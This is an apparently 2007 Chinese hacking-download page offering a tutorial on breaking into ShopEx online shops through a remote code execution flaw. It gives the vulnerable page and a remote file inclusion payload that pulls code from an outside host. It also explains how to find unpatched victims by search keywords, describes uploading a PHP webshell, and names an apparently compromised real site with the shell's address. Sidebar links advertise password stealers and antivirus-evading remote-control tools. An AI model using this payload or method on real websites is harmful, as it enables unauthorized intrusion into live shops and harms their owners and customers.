设为首页
收藏本站
联系我们
 
 
 
 栏目导航  
· 入侵检测 · 安全工具
· 加密解密 · 溢出攻击
· 木马间谍 · 拒绝服务
· 探嗅监听 · 动画教程
· 网络工具 · Q Q专栏
· 常用工具
 
 
 最近更新  
SPAMfighter Standard..
Flock V1.1.0 Beta1┊..
GOM Player V2.1.9.37..
超级巡警之机器狗病毒..
Comodo Firewall Pro ..
Opera@USB 9.26┊挪威..
ACDSee Photo Editor ..
Windows优化大师 V7.8..
Ghost精灵 3.0┊该工具..
Microsoft Virtual PC..
爱普达(Aipuda)多语..
思翔通讯录 build 200..
 
爱源码下载 -> 黑客专区 -> 入侵检测 ->远程代码执行漏洞入侵PHP网站
远程代码执行漏洞入侵PHP网站
软件语言:简体中文
文件大小:2.42 MB
软件类型: 免费源码
资源星级:
运行环境:Win9x/NT/2000/XP/2003/
授权方式:免费版
更新时间:2007-4-26 3:48:00
相关链接:暂无联系方式   Home Page   没有预览图片    [收 藏]
-> 下载地址列表
本地下载
本地下载
软件使用说明:
    QQ 13280672
大家好  我是 阿城   前不久 SHOPEX暴最新远程代码执行漏洞  今天 我就来给大家做

个实战


ShopEx 国内市场占有率最高的网店系统.ShopEx是网络购物软件与技术服务

全面提供商,ShopEx做为国内购物软件的开拓者和实践者,提供了从购物软件

(包括网上商店、网上商城、网上商店多店系统)到相关配套服务(网店推广、

模板设计、流量监测、商业智能分析、网上支付、网店互联、购物系统定制开发等)

以及深层次的电子商务技术服务。

漏洞原理:

出现在 /shop/npsout_reply.php 页面

找这个漏洞页面 可以使用挖掘鸡V1.1版

关键字 就用 : 产品目录 联系我们 关于我们 常见问题 安全交易 购买流程 如何付款

在存在漏洞的网站后面加上:

?INC_SYSHOMEDIR=http://www.sagi.net.cn/php.txt?

下面看我怎么入侵  现在开始  用挖掘鸡   这个已经打上补丁了

在看下一个

官方已经给出漏洞补丁了 可到现在了还有好多站存在这个漏洞

出现了远程执行php命令的画面. 现在我们来上传一个php马 
 
ok 传上去了 现在来看看  好了 http://www.hemudu.cn/shop/php.php

成功拿下 一个 php站  

http://www.shopex.cn/bbs/thread-27523-1-1.html
请速下载V4.7.1 KS47103补丁修正远程代码执行漏洞


ShopEx发布单店版V4.7.1 KS47103修正了一个远程代码执行漏洞。

收到漏洞报告后,ShopEx技术人员快速反应,于30分钟内即完成了补丁的制作测试与发布工作


相关源码  
FckEditor远程图片自动保存插件 For ASP Z-blog
NZDS海量词典远程截取系统 v1.0
波尔远程控制 V5.81_用于公司管理层对员工计算机的监视..
远程盗取游戏密码
Radmin Viewer V3.0_远程控制计算机、支持被控端以服务..
终极免杀上兴远程控制
 
 
中搜索:远程代码执行漏洞入侵PHP网站
中搜索:远程代码执行漏洞入侵PHP网站
中搜索:远程代码执行漏洞入侵PHP网站
中搜索:远程代码执行漏洞入侵PHP网站
中搜索:远程代码执行漏洞入侵PHP网站
中搜索:远程代码执行漏洞入侵PHP网站

Copyright © 2007-2008 AiYuanMa.Com All Rights Reserved

蜀ICP备07504556号